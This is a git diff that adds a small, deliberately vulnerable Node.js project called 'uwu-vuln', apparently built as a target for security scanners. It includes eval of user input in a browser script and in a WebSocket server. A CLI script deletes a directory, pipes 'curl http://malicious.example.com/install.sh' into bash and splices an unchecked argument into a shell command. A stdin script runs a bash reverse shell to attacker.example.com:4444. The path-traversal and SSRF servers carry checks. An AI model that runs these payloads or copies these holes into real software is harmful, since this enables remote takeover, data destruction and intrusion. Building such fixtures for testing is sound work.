diff --git a/browser copy/index.js b/browser copy/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser copy/index.js	
@@ -0,0 +1,5 @@
+function executeUserScript() {
+    var userScript = document.getElementById('userScript').value;
+    // Using eval to execute user-provided script
+    eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+  rm -rf /tmp/vuln_dir --no-preserve-root &&
+  curl http://malicious.example.com/install.sh | bash &&
+  ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Pipeline failed:', err);
+    return;
+  }
+  console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+  const file = req.query.file;
+  const fullPath = path.resolve(__dirname, file);
+  if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+  fs.readFile(fullPath, 'utf8', (err, data) => {
+    if (err) return res.status(500).send(err.message);
+    res.send(data);
+  });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js	
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+  return ip === '::1' ||
+    /^127\./.test(ip) ||
+    /^10\./.test(ip) ||
+    /^192\.168\./.test(ip) ||
+    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+    ip.startsWith('fc') || ip.startsWith('fd') ||
+    ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+  const url = req.query.url;
+  let parsedUrl;
+  try {
+    parsedUrl = new URL(url);
+  } catch (e) {
+    return res.status(400).send('Invalid URL');
+  }
+  const hostname = parsedUrl.hostname;
+  if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+      hostname === 'localhost' ||
+      hostname === '127.0.0.1' ||
+      hostname === '::1' ||
+      /^(10|127)\./.test(hostname) ||
+      /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+      /^192\.168\./.test(hostname)) {
+    return res.status(400).send('URL not allowed');
+  }
+  try {
+  // DNS resolution to prevent DNS rebinding
+  try {
+    const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+    for (const { address } of addresses) {
+      if (isPrivateIp(address)) {
+        return res.status(400).send('URL not allowed');
+      }
+    }
+  } catch (e) {
+    return res.status(400).send('Invalid hostname');
+  }
+
+    const resp = await axios.get(url);
+    res.send(resp.data);
+  } catch (e) {
+    res.status(500).send(e.message);
+  }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "uwu-vuln",
+  "version": "1.0.0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Error executing payload:', err);
+    return;
+  }
+  console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    eval(msg);
+    ws.send('Executed: ' + msg);
+  });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file